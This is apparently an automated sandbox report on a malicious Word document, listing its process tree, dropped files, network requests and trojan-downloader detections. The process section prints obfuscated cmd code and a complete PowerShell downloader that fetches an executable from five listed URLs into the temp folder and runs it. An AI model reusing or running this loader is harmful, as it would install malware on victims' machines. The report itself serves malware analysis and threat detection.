3,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!\|cmd"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
4016	C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451';"	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1832	cmd	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2496	powershell $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ahluniversity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu@http://ptof.club/wcy1UGRiD991_fsn@http://airconpro.co.za/YfhHLpgsKJ0v_Fde@http://schapenbedrijf.nl/e8eGE3bFrc80tWMb'.Split('@');$j3794='o6522';$v4337 = '269';$u4407='a4499';$s8986=$env:temp+'\'+$v4337+'.exe';foreach($o5176 in $k3609){try{$h9410.DownloadFile($o5176, $s8986);$m1861='d1965';If ((Get-Item $s8986).length -ge 40000) {Invoke-Item $s8986;$w1514='m1598';break;}}catch{}}$p8366='b3451';	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 410

Read events

947

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2680	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR86F9.tmp.cvr		—
		MD5:—	SHA256:—
2680	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\560EB2BC.jpg		—
		MD5:—	SHA256:—
2496	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TS3TM0PW97S362Z49DRE.temp		—
		MD5:—	SHA256:—
2496	powershell.exe	C:\Users\admin\AppData\Local\Temp\269.exe		—
		MD5:—	SHA256:—
2680	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$T06893577070808081.doc		pgc
		MD5:F9064703E5FB7DCE89169903383C83F2	SHA256:8C18289B62DE5272952807049365A4EBC43EF979F0EF690EC92639C56D47FDC0
2496	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199b1d.TMP		binary
		MD5:901ECDF767744E6BB59CB023757886E3	SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2496	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:901ECDF767744E6BB59CB023757886E3	SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2680	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		tlb
		MD5:46F07F6D66949E417B9213C0014C87EE	SHA256:D8D28C264E83133DBECD8AC95A3AE5DD2FC08EBB01FAC450FD11F69241B9B8CB
2680	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:BCA7725C8CB9C8D63EC166E879124B21	SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2496	powershell.exe	GET	200	192.185.52.164:80	http://ahluniversity.com/lW8Z9O0kOlt/	US	html	506 b	malicious
2496	powershell.exe	GET	301	192.185.52.164:80	http://ahluniversity.com/lW8Z9O0kOlt	US	html	312 b	malicious
2496	powershell.exe	GET	—	192.185.20.9:80	http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu/	US	—	—	suspicious
2496	powershell.exe	GET	301	192.185.20.9:80	http://www.megafighton.sandboxph.com/wHOiUtFwIBj_vu	US	html	339 b	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2496	powershell.exe	192.185.20.9:80	www.megafighton.sandboxph.com	CyrusOne LLC	US	suspicious
2496	powershell.exe	192.185.52.164:80	ahluniversity.com	CyrusOne LLC	US	malicious

DNS requests

Domain	IP	Reputation
ahluniversity.com	192.185.52.164	malicious
www.megafighton.sandboxph.com	192.185.20.9	suspicious

Threats

PID	Process	Class	Message
2496	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2496	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32

Add for printing

No debug info

General Info

ATT06893577070808081.doc

AE683508038FA547703F55B4E1029BC3

0EB9C898980BD9B3505602E5032730C08300BDC6

7D61C977023CE16E7B7FDE414E15F5B37362BE72125795AC2B07586B812E1304

3072:uFntGJpjL/xSu90OoiLuDKZXfwKeljR1z:uJEhxUOmD+XfwLX

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Unusual execution from Microsoft Office

Starts CMD.EXE for commands execution

Runs app for hidden code execution

SUSPICIOUS

Starts CMD.EXE for commands execution

Application launched itself

Creates files in the user directory

Executes PowerShell scripts

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings